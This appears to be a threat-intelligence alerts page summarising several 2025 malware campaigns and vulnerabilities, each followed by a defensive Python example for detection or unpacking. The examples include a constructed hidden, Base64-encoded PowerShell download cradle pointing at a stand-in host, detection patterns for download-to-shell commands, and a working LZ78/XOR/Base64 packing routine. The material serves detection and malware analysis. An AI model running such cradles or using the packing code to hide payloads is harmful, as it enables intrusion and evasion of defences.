Threat Alerts
Your place for the latest CyberProof cyber threat intelligence alerts and updates
FlexibleFerret Malware Campaign Targets macOS Users
A sophisticated social engineering campaign attributed to North Korean operators is actively targeting Apple users through fraudulent job recruitment websites. The threat, known as FlexibleFerret, represents an evolution of the Contagious Interview campaign that has persisted throughout 2025. This malware operation delivers credential-stealing backdoors and provides attackers with unauthorized system access, posing significant risks to individuals seeking employment opportunities.
The attack begins when job seekers visit convincing fake hiring assessment websites where they complete fraudulent job applications and assessments. Victims provide personal information and may even record video introductions as part of the application process. The critical moment occurs when applicants receive instructions to execute a Terminal command, which attackers claim is necessary to resolve camera or microphone access issues. Once executed, the initial command downloads a shell script that identifies the victim’s Mac architecture and retrieves the appropriate second-stage payload. The script establishes working directories in temporary locations, creates persistence mechanisms through LaunchAgents that automatically launch at login, and displays a fake application that mimics a legitimate password prompt to capture user credentials.
The final stage activates a Golang backdoor that establishes communication with command-and-control infrastructure. This component supports multiple malicious operations including system information collection, file upload and download capabilities, command execution, browser profile theft, and automated credential harvesting. The backdoor maintains persistence through system entries and includes error-handling mechanisms designed to reset the malware if temporary failures occur. The multi-stage delivery process remains largely hidden from users, with captured credentials transmitted to attacker-controlled accounts. This campaign demonstrates the continued effectiveness of social engineering tactics that exploit job seekers’ trust in recruitment processes.
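The persistence step above (a LaunchAgent that starts a binary dropped in a temporary directory at every login) is the most durable artifact this chain leaves on disk, and it is cheap to hunt for. The following is an added example written for this page, not CyberProof's code and not the malware's: it parses LaunchAgent plists and flags ones whose program runs from a staging directory, pipes a download into a shell, or combines RunAtLoad with KeepAlive. The two plists are constructed for the example; on a real host point `scan_launch_agents` at `~/Library/LaunchAgents` and `/Library/LaunchAgents`.

```python
"""Flag macOS LaunchAgents whose program runs from a temporary staging
directory, the persistence pattern described for FlexibleFerret.

Added illustration (not CyberProof's code, not the malware's). The two
plists are constructed for this example; in practice read every *.plist
under ~/Library/LaunchAgents and /Library/LaunchAgents.
"""
import pathlib
import plistlib
import re

# Locations a legitimate login item rarely executes from.
STAGING_DIR = re.compile(
    r"^/(?:private/)?(?:tmp|var/folders)/|^/Users/[^/]+/Library/Caches/|^/Users/Shared/"
)
# curl/wget output piped into a shell, a common dropper one-liner.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z)?sh\b")


def assess_launch_agent(plist_bytes: bytes) -> dict:
    """Return label, program and a list of human-readable findings for one agent."""
    plist = plistlib.loads(plist_bytes)
    args = list(plist.get("ProgramArguments") or [])
    program = plist.get("Program") or (args[0] if args else None)
    # Inspect every argument so that `/bin/sh -c "<path>"` wrappers are caught too.
    command_line = " ".join(str(a) for a in ([program] if program else []) + args[1:])
    findings = []
    for token in command_line.split():
        if STAGING_DIR.match(token):
            findings.append(f"executes from staging dir: {token}")
    if PIPE_TO_SHELL.search(command_line):
        findings.append("pipes a download straight into a shell")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive: starts at login and respawns if killed")
    return {"label": plist.get("Label"), "program": program, "findings": findings}


def scan_launch_agents(directory: str) -> list:
    """Assess every plist in a directory, reporting files plistlib cannot parse."""
    results = []
    for path in sorted(pathlib.Path(directory).glob("*.plist")):
        try:
            result = assess_launch_agent(path.read_bytes())
        except Exception as exc:  # malformed plist: report it rather than crash the sweep
            result = {"label": None, "program": None, "findings": [f"unparseable: {exc}"]}
        result["path"] = str(path)
        results.append(result)
    return results


# Constructed samples: an Apple-looking label pointing into /private/var/folders
# (the per-user temp tree on macOS) versus an ordinary application helper.
SAMPLE_MALICIOUS = plistlib.dumps({
    "Label": "com.apple.update.agent",
    "ProgramArguments": ["/bin/sh", "-c",
                         "/private/var/folders/4k/T/.cache/update_agent --background"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
SAMPLE_BENIGN = plistlib.dumps({
    "Label": "com.example.helper",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(assess_launch_agent(sample))
```

The label check is deliberately absent: a `com.apple.*` label is trivial to forge, so the signal worth acting on is where the program lives and how it is kept alive, not what it calls itself.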
Unusual Cross-Nation APT Cooperation Detected Between Russian and North Korean Groups
Recent analysis identified a rare overlap in command-and-control infrastructure between Russia-aligned Gamaredon, a fast-moving cyber-espionage group known for high-volume phishing and rapid intrusions, and North Korea’s Lazarus Group, a highly resourced actor specializing in financial theft and supply-chain compromise.
The shared C2 assets indicate coordinated deployment logistics or deliberate resource sharing that allows both groups to obscure attribution and reuse infrastructure across separate campaigns.
Such cross-nation APT cooperation is extremely uncommon and points to a potential shift toward more aligned or complementary operations among major state-sponsored actors.
Critical Oracle Identity Manager Pre-Authentication RCE Vulnerability (CVE-2025-61757)
CISA has added a critical Oracle Fusion Middleware vulnerability to its Known Exploited Vulnerabilities catalog. CVE-2025-61757 (CVSS score 9.8) is a missing-authentication flaw that enables complete system takeover through pre-authenticated remote code execution.
The vulnerability affects Oracle Identity Manager: an unauthenticated attacker with HTTP access to the REST WebServices component can exploit it with little effort and gain full control of the system through the Identity Manager interface. Honeypot analysis revealed active exploitation attempts between August and September 2025, with multiple HTTP POST requests targeting the vulnerable endpoint using 556-byte payloads. The attacks originated from different IP addresses but shared identical user agents, indicating coordinated exploitation that preceded Oracle's patch release.
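The honeypot observation above is a reusable detection shape: the same POST target, an identical request-body size, several source addresses, one User-Agent. The following is an added example written for this page, not CyberProof's or Oracle's code: it clusters sensor records by User-Agent and reports agents seen from at least two distinct IPs. The endpoint path and the JSON-lines record format are placeholders for the example (the real vulnerable URI is not given above and your sensor's schema will differ), and the log lines are constructed.

```python
"""Spot coordinated exploitation attempts of the kind described above: POSTs to
one endpoint, identical request-body size, different source IPs, same User-Agent.

Added illustration, not CyberProof's code or Oracle's. The endpoint path and
the JSON-lines log format are placeholders for this example; the real URI and
your sensor's log schema will differ. The log lines are constructed.
"""
import json
from collections import defaultdict

TARGET_PATH = "/iam/rest/example-endpoint"   # placeholder, not the real vulnerable URI
PAYLOAD_LEN = 556                             # request-body size reported in the honeypot analysis


def parse_records(lines):
    """Yield dict records, skipping blank or non-JSON lines."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def cluster_by_user_agent(lines, path=TARGET_PATH, payload_len=PAYLOAD_LEN, min_sources=2):
    """Return {user_agent: {"sources": [...], "first_seen": ts, "last_seen": ts, "hits": n}}
    for User-Agents that sent matching POSTs from at least `min_sources` distinct IPs."""
    clusters = defaultdict(lambda: {"sources": set(), "first_seen": None, "last_seen": None, "hits": 0})
    for rec in parse_records(lines):
        if rec.get("method") != "POST" or rec.get("path") != path:
            continue
        if rec.get("req_len") != payload_len:
            continue
        c = clusters[rec.get("ua", "")]
        c["sources"].add(rec["src"])
        c["hits"] += 1
        ts = rec["ts"]   # ISO-8601 UTC strings compare correctly as text
        c["first_seen"] = ts if c["first_seen"] is None or ts < c["first_seen"] else c["first_seen"]
        c["last_seen"] = ts if c["last_seen"] is None or ts > c["last_seen"] else c["last_seen"]
    return {
        ua: {**c, "sources": sorted(c["sources"])}
        for ua, c in clusters.items() if len(c["sources"]) >= min_sources
    }


# Constructed records: one UA probing from three addresses over several weeks,
# a GET from the same UA (ignored), and a lone curl client that never clusters.
SAMPLE_LOG = """
{"ts": "2025-08-14T03:12:09Z", "src": "198.51.100.7",  "method": "POST", "path": "/iam/rest/example-endpoint", "req_len": 556, "ua": "Mozilla/5.0 (X11; Linux x86_64) scanner/1.0"}
{"ts": "2025-08-20T11:40:51Z", "src": "203.0.113.22", "method": "POST", "path": "/iam/rest/example-endpoint", "req_len": 556, "ua": "Mozilla/5.0 (X11; Linux x86_64) scanner/1.0"}
{"ts": "2025-09-02T22:05:33Z", "src": "192.0.2.140",  "method": "POST", "path": "/iam/rest/example-endpoint", "req_len": 556, "ua": "Mozilla/5.0 (X11; Linux x86_64) scanner/1.0"}
{"ts": "2025-09-02T22:06:01Z", "src": "192.0.2.140",  "method": "GET",  "path": "/iam/rest/example-endpoint", "req_len": 0,   "ua": "Mozilla/5.0 (X11; Linux x86_64) scanner/1.0"}
{"ts": "2025-09-03T08:00:00Z", "src": "198.51.100.9", "method": "POST", "path": "/iam/rest/example-endpoint", "req_len": 556, "ua": "curl/8.5.0"}
{"ts": "2025-09-03T09:00:00Z", "src": "198.51.100.9", "method": "POST", "path": "/iam/rest/other",            "req_len": 556, "ua": "curl/8.5.0"}
""".strip().splitlines()

if __name__ == "__main__":
    for ua, c in cluster_by_user_agent(SAMPLE_LOG).items():
        print(f"{ua}: {c['hits']} hits from {len(c['sources'])} IPs, {c['first_seen']} .. {c['last_seen']}")
```

Because the grouping key is the User-Agent rather than the source address, the cluster survives attacker IP rotation; comparing `first_seen` against the vendor's patch date tells you whether you were exposed to pre-patch exploitation.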
Shai-hulud 2.0 Cloud Supply-Chain Compromise
A sophisticated malware campaign known as Shai-hulud 2.0 has emerged as a major threat to cloud infrastructure and software supply chains, expanding on its predecessor with enhanced backdoor functions and automated propagation capabilities. The malware systematically steals credentials from AWS, GCP, Azure, NPM, and GitHub while introducing a highly dangerous feature that automatically backdoors all NPM packages maintained by compromised developers. This creates an exponentially spreading supply chain threat capable of impacting thousands of downstream users, making Shai-hulud 2.0 one of the most concerning ecosystem-wide compromise mechanisms observed in recent months.
Technical analysis shows the attack begins with a malicious NPM package whose preinstall script executes on installation, deploying the Bun JavaScript runtime and avoiding detection by using the official platform-specific installers. The malware behaves differently on developer machines and in CI/CD environments: in pipelines it executes immediately for maximum credential exposure, while on local systems it runs as a detached background process. On Linux it achieves persistence by escalating privileges through Docker's privileged access and disabling DNS and firewall protections, then harvests credentials from NPM configs, cloud environment variables, and AWS ECS/EKS metadata endpoints. Shai-hulud 2.0 further abuses cloud-native secret management platforms, enumerating AWS Secrets Manager across 17 regions, GCP Secret Manager across all reachable projects, and Azure Key Vault. Its command-and-control system relies on attacker-created GitHub repositories, self-hosted runners, and malicious workflows triggered via discussion posts to execute remote commands. The malware scans entire home directories with TruffleHog and exfiltrates the results as structured JSON files. Its most dangerous capability is automated supply chain backdooring: it identifies every package maintained by the victim, injects malicious preinstall hooks into their tarballs, and republishes them at scale, processing up to 100 packages concurrently, to propagate rapidly across the NPM ecosystem.
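Both the initial infection and the propagation stage above hinge on one mechanism: an install-time lifecycle script that npm runs automatically. The following is an added example written for this page, not CyberProof's code and not the malware: it walks a `node_modules` tree, lists every `preinstall`/`install`/`postinstall`/`prepare` hook, and marks commands that mention a runtime download or detaching from the install process. The sample tree is constructed in a temporary directory, and its package names and script commands are invented for the example.

```python
"""Audit an installed node_modules tree for install-time lifecycle scripts, the
hook Shai-hulud 2.0 abuses to run on `npm install`.

Added illustration, not CyberProof's code and not the malware. The sample tree
is constructed in a temp directory; the package names and script commands in it
are invented for the example.
"""
import json
import pathlib
import re
import tempfile

# npm runs these automatically during install; any of them is code execution on your box.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Tokens that rarely belong in a legitimate build step but match the described tradecraft.
HIGH_RISK = re.compile(r"\b(?:bun|curl|wget|powershell|base64|nohup|setsid)\b", re.IGNORECASE)


def audit_lifecycle_scripts(node_modules) -> list:
    """Return one finding per install-time hook found in any package.json under node_modules."""
    findings = []
    for pkg_json in sorted(pathlib.Path(node_modules).rglob("package.json")):
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, UnicodeDecodeError, json.JSONDecodeError):
            continue
        scripts = meta.get("scripts") if isinstance(meta.get("scripts"), dict) else {}
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if cmd:
                findings.append({
                    "package": meta.get("name", pkg_json.parent.name),
                    "version": meta.get("version"),
                    "hook": hook,
                    "command": cmd,
                    "high_risk": bool(HIGH_RISK.search(cmd)),
                })
    return findings


def build_sample_tree() -> str:
    """Create a constructed node_modules with one clean and one trojanised package."""
    root = pathlib.Path(tempfile.mkdtemp()) / "node_modules"
    clean = root / "left-pad-example"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps({
        "name": "left-pad-example", "version": "1.0.0", "main": "index.js"}))
    bad = root / "fancy-colors-example"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "fancy-colors-example", "version": "4.2.1",
        # constructed: installs a runtime, then runs a dropper detached from the install
        "scripts": {"preinstall": "node install_runtime.js && setsid bun ./env.js"},
    }))
    return str(root)


if __name__ == "__main__":
    for f in audit_lifecycle_scripts(build_sample_tree()):
        tag = "HIGH" if f["high_risk"] else "info"
        print(f"{tag} {f['package']}@{f['version']} {f['hook']}: {f['command']}")
```

Every hook is reported, not only the high-risk ones, because a legitimate-looking `node build.js` is still arbitrary code running with the installing user's credentials and cloud tokens. In CI, setting `ignore-scripts=true` in `.npmrc` (or `npm config set ignore-scripts true`) disables these hooks outright, and allow-listing the few native packages that genuinely need them is far less work than triaging the rest.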
Water Gamayun APT Group Attack
A sophisticated multi-stage attack campaign targeting enterprise and government networks has been uncovered, attributed to the Russia-aligned Water Gamayun APT group. The operation begins with benign-looking web searches that lead victims to compromised legitimate websites and malicious lookalike domains, ultimately resulting in credential theft, backdoor deployment and long-term intelligence collection. The campaign showcases advanced tradecraft, including the exploitation of Windows zero-day vulnerabilities, layered obfuscation and strong operational security to evade detection and maintain persistence across targeted environments.
Analysis shows the infection chain starts when victims land on compromised sites that redirect them to malicious archives. The archives use double extensions to pose as PDFs while actually containing MSC snap-ins that exploit CVE-2025-26633 in the multilingual path resolution of the Windows Microsoft Management Console (MMC). The executed MSC files use TaskPad commands to trigger encoded PowerShell payloads that retrieve additional tools and password-protected archives, relying on multiple obfuscation layers such as nested Base64, UTF-16LE encoding, and runtime string manipulation. The actors hide execution windows using a custom compiled class while showing decoy documents to avoid suspicion. The infrastructure uses randomized path prefixes and strong 21-character archive passwords to hinder sandbox analysis, and payloads are executed repeatedly to establish persistence and likely deploy malware families aligned with the group's toolkit, including EncryptHub, SilentPrism, DarkWisp and Rhadamanthys. Attribution to Water Gamayun is supported by the unique exploitation of the MSC flaw, recognizable PowerShell obfuscation patterns, Win32 API-based process hiding, dual-path infrastructure and social engineering themes consistent with prior operations, highlighting their continued evolution in using trusted-binary proxy execution and zero-day exploits for strategic data exfiltration.
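The nested Base64 and UTF-16LE layering described above is what an analyst has to unwind first, and it follows a fixed rule: PowerShell's `-EncodedCommand` expects Base64 of UTF-16LE text, while outer wrappers tend to be plain Base64 of ASCII. The following is an added example written for this page, not CyberProof's code and not the actors' script: it repeatedly finds the longest Base64-looking token in a command line, decides between UTF-16LE and UTF-8 from the byte pattern, and stops when nothing decodes to printable text. The sample launcher is constructed here (the `.invalid` TLD never resolves).

```python
"""Peel nested Base64 / UTF-16LE layers from a PowerShell launcher, the encoding
stack described for the Water Gamayun chain.

Added illustration, not CyberProof's code and not the actors' script. The
sample command line is constructed here (the .invalid TLD never resolves).
"""
import base64
import binascii
import re
from typing import List, Optional

# A long run of Base64 alphabet, optionally introduced by -e / -enc / -EncodedCommand.
B64_TOKEN = re.compile(r"(?i)(?:-e(?:nc(?:odedcommand)?)?\s+)?([A-Za-z0-9+/]{16,}={0,2})")


def looks_utf16le(raw: bytes) -> bool:
    """ASCII text stored as UTF-16LE (what -EncodedCommand expects) has a NUL in every odd byte."""
    return len(raw) >= 2 and len(raw) % 2 == 0 and all(raw[i] == 0 for i in range(1, len(raw), 2))


def decode_layer(token: str) -> Optional[str]:
    """Base64-decode one token and return printable text, or None if it is not an encoded layer."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-16-le") if looks_utf16le(raw) else raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None   # decoded to binary noise, so the token was not really a layer
    return text


def peel_layers(blob: str, max_depth: int = 8) -> List[str]:
    """Return [outer, ..., innermost] by repeatedly decoding the longest Base64-looking token."""
    layers = [blob]
    current = blob
    for _ in range(max_depth):
        candidates = [m.group(1) for m in B64_TOKEN.finditer(current)]
        if not candidates:
            break
        decoded = decode_layer(max(candidates, key=len))
        if decoded is None or decoded == current:
            break
        layers.append(decoded)
        current = decoded
    return layers


# Constructed sample: an inner download cradle, wrapped as -enc (UTF-16LE Base64),
# then the whole launcher Base64-encoded once more as a second layer.
INNER_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
LAUNCHER = "powershell.exe -nop -w hidden -enc " + base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode()
SAMPLE_BLOB = base64.b64encode(LAUNCHER.encode()).decode()

if __name__ == "__main__":
    for depth, layer in enumerate(peel_layers(SAMPLE_BLOB)):
        print(f"[{depth}] {layer[:90]}")
```

The `max_depth` guard matters in practice: a loader that re-encodes its own output, or a token that happens to decode to printable text, would otherwise keep the loop going. Runtime string manipulation (concatenation, `-replace`, char arrays) is not handled here; that layer still needs a PowerShell sandbox or manual work.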
TangleCrypt Malware Packer Emerges in Qilin Ransomware Ecosystem
Researchers have documented a new Windows malware packer dubbed TangleCrypt, first observed in a September 2025 intrusion where Qilin ransomware operators deployed the STONESTOP EDR killer alongside the malicious ABYSSWORKER kernel driver. TangleCrypt wraps payloads inside PE resources using multiple layers of base64 encoding, LZ78 compression, and XOR encryption, then decrypts and loads the original executable at runtime. It supports flexible execution methods, either injecting the decrypted payload into the current process or into a newly spawned child process, controlled via a configuration string embedded at the end of the payload. Although most samples seen so far carry STONESTOP, the packer is payload agnostic and has also been found protecting other malware such as XWorm.
To hinder analysis, TangleCrypt employs string encryption, dynamic API resolution, and somewhat noisy anti-analysis tricks such as deliberate access violations and unoptimized, bloated code. Its protections are relatively weak, however, and can be bypassed with standard debugging techniques: once analysts hook key APIs such as VirtualAlloc or WriteProcessMemory, manual unpacking is straightforward. Notably, the loader contains implementation flaws, including discarding the original TLS information and reimplementing CRT functions like __getmainargs incompletely, which can leave runtime structures uninitialized and cause crashes when the packed payload is run without elevated privileges. These bugs likely limit its reliability in the wild, but TangleCrypt still represents a flexible and evolving tool for threat actors who want to cloak EDR killers and other high-impact payloads in targeted ransomware operations.
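The wrapping described above (Base64, LZ78 and XOR, then a runtime load) is simple enough to reproduce as a static unpacker once the layer order and the compressor's token format are known. The following is an added example written for this page, not CyberProof's code and not TangleCrypt itself: it implements a textbook LZ78 codec with 3-byte (16-bit index, byte) tokens, a repeating-key XOR, and `pack`/`unpack` helpers. The layer order (Base64 outermost, then XOR, then LZ78) and the token format are assumptions made so the example is complete; the real packer's exact scheme is not given above. The payload stand-in and key are constructed.

```python
"""Reverse a TangleCrypt-style wrapping: Base64 over XOR over LZ78-compressed payload.

Added illustration, not CyberProof's code and not TangleCrypt itself. The layer
order (Base64 outermost, then XOR, then LZ78) and the 3-byte (index, byte) LZ78
token format are assumptions made so the example is complete; the real packer's
exact scheme is not given above. The payload and key are constructed.
"""
import base64
import struct

MAX_ENTRIES = 1 << 16   # dictionary indices are 16-bit in this token format


def lz78_compress(data: bytes) -> bytes:
    """Classic LZ78: emit (index of longest known prefix, next byte) tokens."""
    table = {b"": 0}
    out = bytearray()
    w = b""
    for byte in data:
        wc = w + bytes([byte])
        if wc in table:
            w = wc
            continue
        out += struct.pack(">HB", table[w], byte)
        table[wc] = len(table)
        if len(table) == MAX_ENTRIES:   # mirror the decoder's reset when indices run out
            table = {b"": 0}
        w = b""
    if w:   # trailing phrase already in the table: re-emit it as (prefix index, last byte)
        out += struct.pack(">HB", table[w[:-1]], w[-1])
    return bytes(out)


def lz78_decompress(blob: bytes) -> bytes:
    """Inverse of lz78_compress; rejects truncated streams and out-of-range indices."""
    if len(blob) % 3:
        raise ValueError("LZ78 stream is not a whole number of 3-byte tokens")
    phrases = [b""]
    out = bytearray()
    for off in range(0, len(blob), 3):
        idx, byte = struct.unpack(">HB", blob[off:off + 3])
        if idx >= len(phrases):
            raise ValueError(f"corrupt token: index {idx} not yet defined")
        phrase = phrases[idx] + bytes([byte])
        out += phrase
        phrases.append(phrase)
        if len(phrases) == MAX_ENTRIES:
            phrases = [b""]
    return bytes(out)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack(payload: bytes, key: bytes) -> str:
    """Wrap a payload in the assumed order: LZ78 -> XOR -> Base64."""
    return base64.b64encode(xor_bytes(lz78_compress(payload), key)).decode("ascii")


def unpack(resource: str, key: bytes) -> bytes:
    """Recover the original payload from a packed resource string."""
    return lz78_decompress(xor_bytes(base64.b64decode(resource, validate=True), key))


# Constructed stand-in for a PE payload: a DOS header fragment, zero padding and
# the familiar stub message, repetitive enough for LZ78 to shrink it.
SAMPLE_PAYLOAD = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
                  + b"\x00" * 240
                  + b"This program cannot be run in DOS mode.\r\n$")
SAMPLE_KEY = b"\x5a\xa5\x0f\xf0"

if __name__ == "__main__":
    blob = pack(SAMPLE_PAYLOAD, SAMPLE_KEY)
    print(f"packed {len(SAMPLE_PAYLOAD)} bytes into {len(blob)} Base64 chars")
    print("roundtrip ok:", unpack(blob, SAMPLE_KEY) == SAMPLE_PAYLOAD)
```

With a real sample the key and the layer order come out of the loader's decryption routine in a debugger; once recovered, a static `unpack` like this avoids running the payload at all, which is preferable when that payload is an EDR killer.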